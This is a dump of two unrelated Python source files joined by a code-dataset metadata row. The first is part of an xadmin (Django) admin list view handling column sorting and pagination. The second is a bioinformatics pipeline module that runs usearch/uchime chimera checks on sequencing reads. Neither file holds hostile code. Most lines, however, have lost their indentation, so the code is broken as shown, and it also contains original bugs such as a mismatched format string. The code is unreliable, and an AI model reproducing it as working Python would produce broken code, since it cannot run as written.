def get(self, request, *args, **kwargs):
"""
The 'change list' admin view for this model.
"""
response = self.get_result_list()
if response:
return response
context = self.get_context()
context.update(kwargs or {})
response = self.get_response(context, *args, **kwargs)
return response or TemplateResponse(request, self.object_list_template or
self.get_template_list('views/model_list.html'), context)
@filter_hook
def post_response(self, *args, **kwargs):
pass
@csrf_protect_m
@filter_hook
def post(self, request, *args, **kwargs):
return self.post_result_list() or self.post_response(*args, **kwargs) or self.get(request, *args, **kwargs)
@filter_hook
def get_paginator(self):
return self.paginator_class(self.list_queryset, self.list_per_page, 0, True)
@filter_hook
def get_page_number(self, i):
if i == DOT:
return mark_safe(u'<span class="dot-page">...</span> ')
elif i == self.page_num:
return mark_safe(u'<span class="this-page">%d</span> ' % (i + 1))
else:
return mark_safe(u'<a href="%s"%s>%d</a> ' % (escape(self.get_query_string({PAGE_VAR: i})), (i == self.paginator.num_pages - 1 and ' class="end"' or ''), i + 1))
# Result List methods
@filter_hook
def result_header(self, field_name, row):
ordering_field_columns = self.ordering_field_columns
item = ResultHeader(field_name, row)
text, attr = label_for_field(field_name, self.model,
model_admin=self,
return_attr=True
)
item.text = text
item.attr = attr
if attr and not getattr(attr, "admin_order_field", None):
return item
# OK, it is sortable if we got this far
th_classes = ['sortable']
order_type = ''
new_order_type = 'desc'
sort_priority = 0
sorted = False
# Is it currently being sorted on?
if field_name in ordering_field_columns:
sorted = True
order_type = ordering_field_columns.get(field_name).lower()
sort_priority = ordering_field_columns.keys().index(field_name) + 1
th_classes.append('sorted %sending' % order_type)
new_order_type = {'asc': 'desc', 'desc': 'asc'}[order_type]
# build new ordering param
o_list_asc = [] # URL for making this field the primary sort
o_list_desc = [] # URL for making this field the primary sort
o_list_remove = [] # URL for removing this field from sort
o_list_toggle = [] # URL for toggling order type for this field
make_qs_param = lambda t, n: ('-' if t == 'desc' else '') + str(n)
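        # Illustrative example (hypothetical field names): if the list is already
        # ordered by "name" ascending and this header is "age", the lists built
        # below serialize into ORDER_VAR values such as "-age.name", i.e. column
        # names joined by "." with a leading "-" marking descending order.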
for j, ot in ordering_field_columns.items():
if j == field_name: # Same column
param = make_qs_param(new_order_type, j)
# We want clicking on this header to bring the ordering to the
# front
o_list_asc.insert(0, j)
o_list_desc.insert(0, '-' + j)
o_list_toggle.append(param)
# o_list_remove - omit
else:
param = make_qs_param(ot, j)
o_list_asc.append(param)
o_list_desc.append(param)
o_list_toggle.append(param)
o_list_remove.append(param)
if field_name not in ordering_field_columns:
o_list_asc.insert(0, field_name)
o_list_desc.insert(0, '-' + field_name)
item.sorted = sorted
item.sortable = True
item.ascending = (order_type == "asc")
item.sort_priority = sort_priority
menus = [
('asc', o_list_asc, 'caret-up', _(u'Sort ASC')),
('desc', o_list_desc, 'caret-down', _(u'Sort DESC')),
]
if sorted:
row['num_sorted_fields'] = row['num_sorted_fields'] + 1
menus.append((None, o_list_remove, 'times', _(u'Cancel Sort')))
item.btns.append('<a class="toggle" href="%s"><i class="fa fa-%s"></i></a>' % (
self.get_query_string({ORDER_VAR: '.'.join(o_list_toggle)}), 'sort-up' if order_type == "asc" else 'sort-down'))
        item.menus.extend([
            '<li%s><a href="%s" class="active"><i class="fa fa-%s"></i> %s</a></li>' % (
                (' class="active"' if sorted and order_type == i[0] else ''),
                self.get_query_string({ORDER_VAR: '.'.join(i[1])}), i[2], i[3]
            ) for i in menus])
item.classes.extend(th_classes)
return item
@filter_hook
def result_headers(self):
"""
Generates the list column headers.
"""
row = ResultRow()
row['num_sorted_fields'] = 0
row.cells = [self.result_header(
field_name, row) for field_name in self.list_display]
return row
@filter_hook
def result_item(self, obj, field_name, row):
"""
Generates the actual list of data.
"""
item = ResultItem(field_name, row)
try:
f, attr, value = lookup_field(field_name, obj, self)
except (AttributeError, ObjectDoesNotExist, NoReverseMatch):
item.text = mark_safe("<span class='text-muted'>%s</span>" % EMPTY_CHANGELIST_VALUE)
else:
if f is None:
item.allow_tags = getattr(attr, 'allow_tags', False)
boolean = getattr(attr, 'boolean', False)
if boolean:
item.allow_tags = True
item.text = boolean_icon(value)
else:
item.text = smart_unicode(value)
else:
if isinstance(f.rel, models.ManyToOneRel):
field_val = getattr(obj, f.name)
if field_val is None:
item.text = mark_safe("<span class='text-muted'>%s</span>" % EMPTY_CHANGELIST_VALUE)
else:
item.text = field_val
else:
item.text = display_for_field(value, f)
if isinstance(f, models.DateField)\
or isinstance(f, models.TimeField)\
or isinstance(f, models.ForeignKey):
item.classes.append('nowrap')
item.field = f
item.attr = attr
item.value = value
# If list_display_links not defined, add the link tag to the first field
if (item.row['is_display_first'] and not self.list_display_links) \
or field_name in self.list_display_links:
item.row['is_display_first'] = False
item.is_display_link = True
if self.list_display_links_details:
item_res_uri = self.model_admin_url("detail", getattr(obj, self.pk_attname))
if item_res_uri:
if self.has_change_permission(obj):
edit_url = self.model_admin_url("change", getattr(obj, self.pk_attname))
else:
edit_url = ""
item.wraps.append('<a data-res-uri="%s" data-edit-uri="%s" class="details-handler" rel="tooltip" title="%s">%%s</a>'
% (item_res_uri, edit_url, _(u'Details of %s') % str(obj)))
else:
url = self.url_for_result(obj)
item.wraps.append(u'<a href="%s">%%s</a>' % url)
return item
@filter_hook
def result_row(self, obj):
row = ResultRow()
row['is_display_first'] = True
row['object'] = obj
row.cells = [self.result_item(
obj, field_name, row) for field_name in self.list_display]
return row
@filter_hook
def results(self):
results = []
for obj in self.result_list:
results.append(self.result_row(obj))
return results
@filter_hook
def url_for_result(self, result):
return self.get_object_url(result)
# Media
@filter_hook
def get_media(self):
media = super(ListAdminView, self).get_media() + self.vendor('xadmin.page.list.js', 'xadmin.page.form.js')
if self.list_display_links_details:
media += self.vendor('xadmin.plugin.details.js', 'xadmin.form.css')
return media
# Blocks
@inclusion_tag('xadmin/includes/pagination.html')
def block_pagination(self, context, nodes, page_type='normal'):
"""
Generates the series of links to the pages in a paginated list.
"""
paginator, page_num = self.paginator, self.page_num
pagination_required = (
not self.show_all or not self.can_show_all) and self.multi_page
if not pagination_required:
page_range = []
else:
ON_EACH_SIDE = {'normal': 5, 'small': 3}.get(page_type, 3)
ON_ENDS = 2
# If there are 10 or fewer pages, display links to every page.
            # Otherwise, do some fancy pagination.
if paginator.num_pages <= 10:
page_range = range(paginator.num_pages)
else:
# Insert "smart" pagination links, so that there are always ON_ENDS
# links at either end of the list of pages, and there are always
# ON_EACH_SIDE links at either end of the "current page" link.
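                # Illustrative example: with 50 pages and page_num == 20 this
                # yields [0, 1, 2, 3, DOT, 15 ... 25, DOT, 48, 49].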
page_range = []
if page_num > (ON_EACH_SIDE + ON_ENDS):
page_range.extend(range(0, ON_EACH_SIDE - 1))
page_range.append(DOT)
page_range.extend(
range(page_num - ON_EACH_SIDE, page_num + 1))
else:
page_range.extend(range(0, page_num + 1))
if page_num < (paginator.num_pages - ON_EACH_SIDE - ON_ENDS - 1):
page_range.extend(
range(page_num + 1, page_num + ON_EACH_SIDE + 1))
page_range.append(DOT)
page_range.extend(range(
paginator.num_pages - ON_ENDS, paginator.num_pages))
else:
page_range.extend(range(page_num + 1, paginator.num_pages))
need_show_all_link = self.can_show_all and not self.show_all and self.multi_page
return {
'cl': self,
'pagination_required': pagination_required,
'show_all_url': need_show_all_link and self.get_query_string({ALL_VAR: ''}),
'page_range': map(self.get_page_number, page_range),
'ALL_VAR': ALL_VAR,
'1': 1,
}
| apache-2.0 | 725,250,696,843,273,700 | 38.016616 | 173 | 0.546827 | false |
avoorhis/vamps-node.js | public/scripts/node_process_scripts/gast/chimera.py | 1 | 34367 | import subprocess
import sys, os
import re
import time
from pipeline.pipelinelogging import logger
from pipeline.utils import Dirs, PipelneUtils
from pipeline.utils import *
from pprint import pprint
from collections import defaultdict, namedtuple
sys.path.append("/xraid/bioware/linux/seqinfo/bin")
sys.path.append("/Users/ashipunova/bin/illumina-utils")
sys.path.append("/Users/ashipunova/bin/illumina-utils/illumina-utils/scripts")
sys.path.append("/bioware/merens-illumina-utils")
#import fastalib as fa
import IlluminaUtils.lib.fastalib as fa
import pipeline.constants as C
import json
class Chimera:
""" Define here """
def __init__(self, runobj = None):
self.utils = PipelneUtils()
self.runobj = runobj
self.run_keys = self.runobj.run_keys
self.rundate = self.runobj.run
try:
self.use_cluster = self.runobj.use_cluster
except:
self.use_cluster = True
self.chg_suffix = ".chg"
self.chimeras_suffix = ".chimeras"
self.ref_suffix = ".db"
self.denovo_suffix = ".txt"
self.nonchimeric_suffix = "." + C.nonchimeric_suffix #".nonchimeric.fa"
self.chimeric_suffix = ".chimeric.fa"
self.base_suffix = "unique" + self.chimeras_suffix
try:
if self.runobj.lane_name:
lane_name = self.runobj.lane_name
else:
lane_name = ''
except:
lane_name = ''
if self.runobj.vamps_user_upload:
site = self.runobj.site
dir_prefix = self.runobj.user + '_' + self.runobj.run
self.dirs = Dirs(self.runobj.vamps_user_upload, dir_prefix, self.runobj.platform, lane_name = lane_name, site = site)
self.idx_keys = convert_unicode_dictionary_to_str(json.loads(open(self.runobj.trim_status_file_name,"r").read()))["new_lane_keys"]
self.indir = self.dirs.check_dir(self.dirs.trimming_dir)
self.outdir = self.dirs.check_dir(self.dirs.chimera_dir)
else:
site = ''
dir_prefix = self.runobj.run
self.dirs = Dirs(self.runobj.vamps_user_upload, dir_prefix, self.runobj.platform, lane_name = lane_name, site = site)
self.indir = self.dirs.check_dir(self.dirs.reads_overlap_dir)
self.outdir = self.dirs.check_dir(self.dirs.chimera_dir)
# self.usearch_cmd = C.usearch_cmd
self.usearch_cmd = C.usearch6_cmd
#self.abskew = C.chimera_checking_abskew
self.refdb = C.chimera_checking_refdb_6
self.its_refdb = C.chimera_checking_its_refdb_6
self.input_file_names = self.make_chimera_input_illumina_file_names()
# pprint(self.run_keys)
# self.output_file_names = self.make_chimera_output_illumina_file_names(self.input_file_names)
def make_chimera_input_illumina_file_names(self):
input_file_names = {}
for idx_key in self.run_keys:
file_name = idx_key + "_" + C.filtered_suffix + ".unique"
if os.path.exists(os.path.join(self.indir, file_name)):
input_file_names[idx_key] = file_name
return input_file_names
# def make_chimera_output_illumina_file_names(self, input_file_names):
# output_file_names = {}
# for idx_key, input_file_name in input_file_names.iteritems():
# output_file_names[idx_key] = input_file_name
# return output_file_names
def get_current_dirname(self, in_or_out = ""):
if in_or_out == "":
cur_dirname = self.indir
else:
cur_dirname = self.outdir
return cur_dirname
def is_chimera_check_file(self, filename):
return filename.endswith((self.chimeras_suffix + self.denovo_suffix, self.chimeras_suffix + self.ref_suffix, self.chimeric_suffix, self.nonchimeric_suffix))
def get_current_filenames(self, cur_dirname):
cur_file_names = []
if cur_dirname == self.indir:
cur_file_names = self.input_file_names.values()
elif cur_dirname == self.outdir:
cur_file_names = self.get_chimera_file_names(self.outdir)
return cur_file_names
def get_chimera_file_names(self, cur_dirname):
cur_file_names = []
for dirname, dirnames, filenames in os.walk(cur_dirname):
cur_file_names = [filename for filename in filenames if (self.is_chimera_check_file(filename))]
return cur_file_names
# def illumina_frequency_size(self, in_or_out = "", find = "frequency:", replace = ";size="):
# cur_dirname = self.get_current_dirname(in_or_out)
# cur_file_names = self.get_current_filenames(cur_dirname)
# # print "cur_file_names: "
# # pprint(cur_file_names)
# change_from_suffix = ""
# change_to_suffix = self.chg_suffix
# # print "find = %s, replace = %s" % (find, replace)
# regex = re.compile(r"%s" % find)
#
# for cur_file_name in cur_file_names:
# file_name = os.path.join(cur_dirname, cur_file_name)
# with open(file_name + change_from_suffix, "r") as sources:
# lines = sources.readlines()
# with open(file_name + change_to_suffix, "w") as target:
# for line in lines:
# target.write(regex.sub(replace, line))
def read_file(self, source_name):
with open(source_name, "r") as sources:
return sources.readlines()
def illumina_sed(self, lines, target_name, regex, replace, uppercase):
with open(target_name, "w") as target:
for line in lines:
if line.startswith(">"):
line1 = regex.sub(replace, line)
else:
if (uppercase):
line1 = line.upper()
else:
line1 = line
target.write(line1)
def call_illumina_sed(self, from_to):
"""
from_to = from_frequency_to_size or from_size_to_frequency
"""
sed_from_to = namedtuple('sed_from_to', 'find, replace, cur_dirname, cur_file_names, change_from_suffix, change_to_suffix, uppercase')
from_frequency_to_size = sed_from_to(
find = "frequency:",
replace = ";size=",
cur_dirname = self.indir,
cur_file_names = self.get_current_filenames(self.indir),
change_from_suffix = "",
change_to_suffix = self.chg_suffix,
uppercase = True
)
from_size_to_frequency = sed_from_to(
find = ";size=",
replace = "frequency:",
cur_dirname = self.outdir,
cur_file_names = self.get_chimera_file_names(self.outdir),
change_from_suffix = "",
change_to_suffix = "",
uppercase = False
)
if (from_to == "from_frequency_to_size"):
tuple_name = from_frequency_to_size
elif (from_to == "from_size_to_frequency"):
tuple_name = from_size_to_frequency
regex = re.compile(r"%s" % tuple_name.find)
# print "find = %s, replace = %s" % (find, replace)
if (not tuple_name.cur_file_names) and (tuple_name == from_frequency_to_size):
self.utils.print_both('ERROR: Did not find uniqued files (".unique") in %s, please check if the previous step has finished. Exiting.\n' % self.indir)
sys.exit()
for cur_file_name in tuple_name.cur_file_names:
file_name = os.path.join(tuple_name.cur_dirname, cur_file_name)
source_name = file_name + tuple_name.change_from_suffix
target_name = file_name + tuple_name.change_to_suffix
lines = self.read_file(source_name)
self.illumina_sed(lines, target_name, regex, tuple_name.replace, tuple_name.uppercase)
def illumina_freq_to_size_in_chg(self):
# TODO: not used?
find1 = "frequency:"
replace1 = ";size="
regex1 = re.compile(r"%s" % find1)
# print "cur_file_names: "
# pprint(cur_file_names)
cur_dirname = self.get_current_dirname()
cur_file_names = self.get_current_filenames(cur_dirname)
change_from_suffix = ""
change_to_suffix = self.chg_suffix
# print "find = %s, replace = %s" % (find, replace)
for cur_file_name in cur_file_names:
file_name = os.path.join(cur_dirname, cur_file_name)
with open(file_name + change_from_suffix, "r") as sources:
lines = sources.readlines()
with open(file_name + change_to_suffix, "w") as target:
# line2 = [regex1.sub(replace1, line) if line.startswith(">") else line.upper() for line in lines]
for line in lines:
if line.startswith(">"):
line1 = regex1.sub(replace1, line)
else:
line1 = line.upper()
# print line1
target.write(line1)
def illumina_size_to_freq_in_chimer(self):
find1 = ";size="
replace1 = "frequency:"
regex1 = re.compile(r"%s" % find1)
cur_file_names = self.get_chimera_file_names(self.outdir)
for file_chim in cur_file_names:
file_chim_path = os.path.join(self.outdir, file_chim)
with open(file_chim_path, "r") as sources:
lines = sources.readlines()
with open(file_chim_path, "w") as target:
for line in lines:
line1 = regex1.sub(replace1, line)
target.write(line1)
def illumina_rm_size_files(self):
for idx_key in self.input_file_names:
file_name = os.path.join(self.indir, self.input_file_names[idx_key] + self.chg_suffix)
if os.path.exists(file_name):
os.remove(file_name)
# def illumina_chimera_size_files(self):
#
# import os
# [os.rename(f, f.replace('_', '-')) for f in os.listdir('.') if not f.startswith('.')]
def check_if_cluster_is_done(self, time_before):
cluster_done = False
check_qstat_cmd_line = "qstat | grep \"%s\" | grep usearch | wc -l" % time_before
# check_qstat_cmd_line = "qstat | grep usearch"
self.utils.print_both("check_qstat_cmd_line = %s" % check_qstat_cmd_line)
try:
p = subprocess.Popen(check_qstat_cmd_line, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
num_proc = int(output)
self.utils.print_both("qstat is running %s 'usearch' processes" % num_proc)
# pprint(p)
if (num_proc == 0):
cluster_done = True
# print "cluster_done from check_if_cluster_is_done = %s" % cluster_done
except:
self.utils.print_both("Chimera checking can be done only on a cluster.")
raise
return cluster_done
def create_chimera_cmd(self, input_file_name, output_file_name, ref_or_novo, ref_db = ""):
"""
http://www.drive5.com/usearch/manual/uchime_denovo.html
from usearch -help
Chimera detection (UCHIME ref. db. mode):
usearch -uchime q.fasta [-db db.fasta] [-chimeras ch.fasta]
[-nonchimeras good.fasta] [-uchimeout results.uch] [-uchimealns results.alns]
Chimera detection (UCHIME de novo mode):
usearch -uchime amplicons.fasta [-chimeras ch.fasta] [-nonchimeras good.fasta]
[-uchimeout results.uch] [-uchimealns results.alns]
Input is estimated amplicons with integer abundances specified using ";size=N".
usearch -uchime_denovo amplicons.fasta -uchimeout results.uchime
"""
uchime_cmd_append = ""
db_cmd_append = ""
dir_cmd_append = ""
if (ref_or_novo == "denovo"):
uchime_cmd_append = " -uchime_denovo "
output_file_name = output_file_name + self.chimeras_suffix + self.denovo_suffix
elif (ref_or_novo == "ref"):
uchime_cmd_append = " -uchime_ref "
output_file_name = output_file_name + self.chimeras_suffix + self.ref_suffix
db_cmd_append = " -db " + ref_db
dir_cmd_append = " -strand plus"
else:
self.utils.print_both("Incorrect method, should be \"denovo\" or \"ref\"")
self.utils.print_both("output_file_name = %s" % output_file_name)
uchime_cmd = C.clusterize_cmd
uchime_cmd += " "
uchime_cmd += self.usearch_cmd
uchime_cmd += uchime_cmd_append + input_file_name
uchime_cmd += db_cmd_append
uchime_cmd += " -uchimeout " + output_file_name
"""if we need nonchimeric for denovo and db separate we might create them here
# uchime_cmd += " -nonchimeras "
# uchime_cmd += (output_file_name + self.nonchimeric_suffix)
"""
uchime_cmd += " -chimeras " + (output_file_name + self.chimeric_suffix)
uchime_cmd += dir_cmd_append
uchime_cmd += " -notrunclabels"
# print "uchime_cmd FROM create_chimera_cmd = %s" % (uchime_cmd)
return uchime_cmd
def get_ref_db(self, dna_region):
ref_db = ''
if dna_region.upper() == 'ITS':
logger.debug("got an ITS dna region so using refdb: " + self.its_refdb)
ref_db = self.its_refdb
else:
logger.debug("using standard refdb: " + self.refdb)
ref_db = self.refdb
return ref_db
def chimera_checking(self, ref_or_novo):
chimera_region_found = False
output = {}
for idx_key in self.input_file_names:
# print "idx_key, self.input_file_names[idx_key] = %s, %s" % (idx_key, self.input_file_names)
input_file_name = os.path.join(self.indir, self.input_file_names[idx_key] + self.chg_suffix)
output_file_name = os.path.join(self.outdir, self.input_file_names[idx_key])
dna_region = self.runobj.samples[idx_key].dna_region
# print "dna_region = %s" % dna_region
if dna_region in C.regions_to_chimera_check:
chimera_region_found = True
else:
logger.debug('region not checked: ' + dna_region)
continue
# print "input_file_name = %s \noutput_file_name = %s" % (input_file_name, output_file_name)
ref_db = self.get_ref_db(dna_region)
# print "dna_region = %s; ref_db = %s; ref_or_novo = %s" % (dna_region, ref_db, ref_or_novo)
uchime_cmd = self.create_chimera_cmd(input_file_name, output_file_name, ref_or_novo, ref_db)
self.utils.print_both("\n==================\n%s command: %s" % (ref_or_novo, uchime_cmd))
try:
logger.info("chimera checking command: " + str(uchime_cmd))
output[idx_key] = subprocess.Popen(uchime_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except OSError, e:
self.utils.print_both("Problems with this command: %s" % (uchime_cmd))
if self.utils.is_local():
print >>sys.stderr, "Execution of %s failed: %s" % (uchime_cmd, e)
else:
print >>sys.stderr, "Execution of %s failed: %s" % (uchime_cmd, e)
self.utils.print_both("Execution of %s failed: %s" % (uchime_cmd, e))
raise
# ???
if not chimera_region_found:
return ('NOREGION', 'No regions found that need checking', '')
else:
return ("The usearch commands were created")
def get_chimeric_ids(self):
ids = set()
chimera_file_names = self.get_chimera_file_names(self.outdir)
file_ratio = self.check_chimeric_stats()
for file_name in chimera_file_names:
# print "from get_chimeric_ids: file_name = %s" % file_name
if file_name.endswith(self.chimeric_suffix):
both_or_denovo = self.get_chimeras_suffix(file_ratio, file_name)
# TODO: run ones for each file_base = ".".join(file_name.split(".")[0:3]) (for txt and db)
if file_name.endswith(both_or_denovo):
file_name_path = os.path.join(self.outdir, file_name)
self.utils.print_both("Get ids from %s" % file_name_path)
read_fasta = fa.ReadFasta(file_name_path)
ids.update(set(read_fasta.ids))
return ids
def get_chimeras_suffix(self, file_ratio, file_name):
""" use only de-novo (.txt) chimeric if
check_chimeric_stats shows
ratio ref to de-novo > 3
e.g.
if denovo_only:
chimeric_suffix = self.chimeras_suffix + self.denovo_suffix + self.chimeric_suffix
if no:
chimeras_suffix = self.chimeric_suffix
if file_name.endswith(chimeric_suffix):
...
# first_name, last_name = get_name()
"""
# for file_basename in file_ratio:
(percent_ref, ratio) = file_ratio[".".join(file_name.split(".")[0:3])]
chimeric_fa_suffix = ""
# print "percent_ref = %s, ratio = %s" % (percent_ref, ratio)
# if (percent_ref > 15) and (ratio > 2):
if ratio > 3:
chimeric_fa_suffix = self.chimeras_suffix + self.denovo_suffix + self.chimeric_suffix
else:
chimeric_fa_suffix = self.chimeric_suffix
return chimeric_fa_suffix
def move_out_chimeric(self):
chimeric_ids = self.get_chimeric_ids()
for idx_key in self.input_file_names:
fasta_file_path = os.path.join(self.indir, self.input_file_names[idx_key])
read_fasta = fa.ReadFasta(fasta_file_path)
read_fasta.close()
non_chimeric_file = fasta_file_path + self.nonchimeric_suffix
non_chimeric_fasta = fa.FastaOutput(non_chimeric_file)
fasta = fa.SequenceSource(fasta_file_path, lazy_init = False)
while fasta.next():
if not fasta.id in chimeric_ids:
non_chimeric_fasta.store(fasta, store_frequencies = False)
non_chimeric_fasta.close()
def check_chimeric_stats(self):
all_lines_suffix = self.denovo_suffix # ".txt" or ".db, doesn't matter"
chimera_ref_suffix = self.ref_suffix + self.chimeric_suffix #".db.chimeric.fa"
chimera_denovo_suffix = self.denovo_suffix + self.chimeric_suffix # ".txt.chimeric.fa"
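        # For each sample's "...unique.chimeras" base name, compare the number of
        # reads checked (lines in the de novo .txt report) with the counts flagged
        # by the reference and de novo detectors; the resulting (percent_ref, ratio)
        # pairs drive get_chimeras_suffix() above.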
filenames = self.get_basenames(self.get_current_filenames(self.outdir))
file_ratio = {}
for file_basename in filenames:
# print file_basename
all_lines = 0
ref_lines = 0
denovo_lines = 0
ratio = 0
percent_ref = 0
percent_denovo = 0
all_lines_file_name = os.path.join(self.outdir, file_basename + all_lines_suffix)
ref_lines_file_name = os.path.join(self.outdir, file_basename + chimera_ref_suffix)
denovo_lines_file_name = os.path.join(self.outdir, file_basename + chimera_denovo_suffix)
all_lines = int(self.wccount(all_lines_file_name) or 0)
ref_lines = int(self.get_fa_lines_count(ref_lines_file_name) or 0)
denovo_lines = int(self.get_fa_lines_count(denovo_lines_file_name) or 0)
# denovo_lines = int(denovo_lines or 0)
if (ref_lines == 0) or (all_lines == 0):
file_ratio[file_basename] = (0, 0)
continue
else:
percent_ref = self.percent_count(all_lines, ref_lines)
if (denovo_lines == 0):
file_ratio[file_basename] = (percent_ref, percent_ref) #use ref instead of ratio, because we are actually looking for a huge difference between ref and denovo (ref > 15 and denovo = 0)
continue
if (denovo_lines > 0):
ratio = self.count_ratio(ref_lines, denovo_lines)
percent_denovo = self.percent_count(all_lines, denovo_lines)
file_ratio[file_basename] = (percent_ref, ratio)
# percent_ref = int(percent_ref or 0)
if (percent_ref > 15):
self.utils.print_both("=" * 50)
self.utils.print_both(file_basename)
# print "all_lines_file_name = %s, ref_lines_file_name = %s, denovo_lines_file_name = %s" % (all_lines_file_name, ref_lines_file_name, denovo_lines_file_name)
self.utils.print_both("all_lines = %s, ref_lines = %s, denovo_lines = %s" % (all_lines, ref_lines, denovo_lines))
self.utils.print_both("ratio = %s" % ratio)
self.utils.print_both("percent_ref = %s, percent_denovo = %s" % (percent_ref, percent_denovo))
return file_ratio
def get_basenames(self, filenames):
file_basenames = set()
for f in filenames:
file_basename = ".".join(f.split(".")[0:3])
if file_basename.endswith(self.base_suffix):
file_basenames.add(file_basename)
return file_basenames
def wccount(self, filename):
return subprocess.check_output(['wc', '-l', filename]).split()[0]
def count_ratio(self, ref_num, denovo_num):
try:
return float(ref_num or 0) / float(denovo_num or 0)
        except ZeroDivisionError:
            # print "There is no denovo chimeras to count ratio."
            pass
def get_fa_lines_count(self, file_name):
# todo: use fastalib to get cnt?
# return fa.SequenceSource(file_name, lazy_init = False).total_seq
        try:
            with open(file_name) as file_open:
                return len([l for l in file_open.readlines() if l.startswith('>')])
        except IOError, e:
            self.utils.print_both(e)
            # print "%s\nThere is no such file: %s" % (e, file_name)
            return 0
def percent_count(self, all_lines, chimeric_count):
try:
return float(chimeric_count or 0) * 100 / float(all_lines or 0)
        except ZeroDivisionError:
            # print "There is no denovo chimeras to count ratio."
            pass
"""
-----------------------------------------------------------------------------
For 454.
not tested
"""
def chimera_denovo(self):
chimera_region_found = False
output = {}
cluster_id_list = []
for idx_key in self.idx_keys:
input_file_name = os.path.join(self.indir, idx_key +'.abund.fa')
if os.path.isfile(input_file_name):
output_file_name = os.path.join(self.outdir, idx_key +'.chimera.denovo')
#open(output_file_name, 'a').close() # make sure file exists
log_file = os.path.join(self.outdir,idx_key+".denovo.log")
dna_region = self.runobj.samples[idx_key].dna_region
logger.debug("dna_region = %s" % dna_region)
if self.runobj.vamps_user_upload:
# VAMPS users can chimera check regardless of region chosen
chimera_region_found = True
else:
if dna_region in C.regions_to_chimera_check:
chimera_region_found = True
else:
logger.debug('region not checked: ' + dna_region)
continue
self.utils.print_both("input_file_name = %s \noutput_file_name = %s" % (input_file_name, output_file_name))
# uchime_cmd = C.clusterize_cmd
# uchime_cmd += " "
# uchime_cmd += self.usearch_cmd
# uchime_cmd += " --uchime "
# uchime_cmd += input_file_name
# uchime_cmd += " --uchimeout "
# uchime_cmd += output_file_name
# uchime_cmd += " --abskew "
# uchime_cmd += self.abskew
uchime_cmd=''
if self.use_cluster:
uchime_cmd += C.clusterize_cmd
uchime_cmd += " "
uchime_cmd += " -log "
uchime_cmd += log_file
uchime_cmd += " "
uchime_cmd += self.usearch_cmd
uchime_cmd += " -uchime_denovo "
uchime_cmd += input_file_name
uchime_cmd += " -uchimeout "
uchime_cmd += output_file_name
logger.debug("uchime_denovo_cmd = %s" % (uchime_cmd))
try:
logger.info("chimera denovo command: " + str(uchime_cmd))
# subprocess.Popen(uchime_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#output[idx_key] = subprocess.Popen(uchime_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output[idx_key] = subprocess.check_output(uchime_cmd, shell=True)
self.utils.print_both("output[idx_key] = %s" % output[idx_key])
self.utils.print_both(output[idx_key].split()[2])
cluster_id_list.append(output[idx_key].split()[2])
except OSError, e:
self.utils.print_both("Problems with this command: %s" % (uchime_cmd))
if self.utils.is_local():
print >>sys.stderr, "Execution of %s failed: %s" % (uchime_cmd, e)
else:
print >>sys.stderr, "Execution of %s failed: %s" % (uchime_cmd, e)
self.utils.print_both("Execution of %s failed: %s" % (uchime_cmd, e))
raise
# ???
if not chimera_region_found:
return ('NOREGION', 'No regions found that need checking', '')
# ???
# for idx_key in output:
# if len(output[idx_key]) > 50 or len(output[idx_key]) < 40:
# return ('ERROR','uchime ref may have broken or empty', idx_key)
# finally
if cluster_id_list:
            return ('SUCCESS', 'uchime denovo seems to have been submitted successfully', cluster_id_list)
        else:
            return ('ERROR', 'uchime denovo returned no cluster IDs', cluster_id_list)
def chimera_reference(self):
chimera_region_found = False
output = {}
cluster_id_list = []
for idx_key in self.run_keys:
dna_region = self.runobj.samples[idx_key].dna_region
if self.runobj.vamps_user_upload:
# VAMPS users can chimera check regardless of region chosen
chimera_region_found = True
else:
if dna_region in C.regions_to_chimera_check:
chimera_region_found = True
else:
logger.debug('region not checked: ' + dna_region)
continue
input_file_name = os.path.join(self.indir, idx_key +'.abund.fa')
if os.path.isfile(input_file_name):
output_file_name = os.path.join(self.outdir,idx_key+".chimera.ref")
#open(output_file_name, 'a').close() # make sure file exists
log_file = os.path.join(self.outdir,idx_key+".ref.log")
logger.debug("OUT FILE NAME: " + output_file_name)
# which ref db to use?
ref_db = ''
if dna_region.upper() == 'ITS':
logger.debug("got an ITS dna region so using refdb: " + self.its_refdb)
ref_db = self.its_refdb
else:
logger.debug("using standard refdb: " + self.refdb)
ref_db = self.refdb
uchime_cmd=''
if self.use_cluster:
uchime_cmd = C.clusterize_cmd
uchime_cmd += " "
uchime_cmd += " -log "
uchime_cmd += log_file
uchime_cmd += " "
uchime_cmd += self.usearch_cmd
uchime_cmd += " -uchime_ref "
uchime_cmd += input_file_name
uchime_cmd += " -uchimeout "
uchime_cmd += output_file_name
uchime_cmd += " -db "
uchime_cmd += ref_db
uchime_cmd += " -strand "
uchime_cmd += "plus"
logger.debug("uchime_ref_cmd = %s" % (uchime_cmd))
try:
logger.info("chimera reference command: " + str(uchime_cmd))
output[idx_key] = subprocess.check_output(uchime_cmd, shell=True)
#print 'outsplit',output[idx_key].split()[2]
cluster_id_list.append(output[idx_key].split()[2])
#print 'Have %d bytes in output' % len(output)
#print 'ref',idx_key,output,len(output)
if len(output[idx_key]) < 50 and len(output[idx_key]) > 40:
logger.debug(idx_key + " uchime ref seems to have been submitted successfully")
else:
if self.use_cluster:
print >>sys.stderr, "uchime ref may be broke"
self.utils.print_both("uchime ref may be broke")
except OSError, e:
print >>sys.stderr, "Execution of chimera_reference failed: %s" % (uchime_cmd, e)
self.utils.print_both("Execution of chimera_reference failed: %s" % (uchime_cmd, e))
raise
if not chimera_region_found:
return ('NOREGION','No regions found that need checking','')
for idx_key in output:
if (len(output[idx_key]) > 50 or len(output[idx_key]) < 40) and self.use_cluster:
return ('ERROR','uchime ref may have broken or empty',idx_key)
return ('SUCCESS','uchime ref seems to have been submitted successfully',cluster_id_list)
def write_chimeras_to_deleted_file(self):
for idx_key in self.run_keys:
# open deleted file and append chimera to it
# open and read both chimeras files: chimeras.db and chimeras.txt
# hash to remove dupes
chimera_deleted = {}
denovo_file = os.path.join(self.outdir, idx_key +'.chimera.denovo')
ref_file = os.path.join(self.outdir,idx_key+".chimera.ref")
# deleted file is in trimming dir for vampsuser
deleted_file = os.path.join(self.indir, idx_key+".deleted.txt")
for file in [denovo_file, ref_file]:
if os.path.isfile(file):
fh = open(file,"r")
# make a list of chimera deleted read_ids
for line in fh.readlines():
lst = line.strip().split()
id = lst[1].split(';')[0]
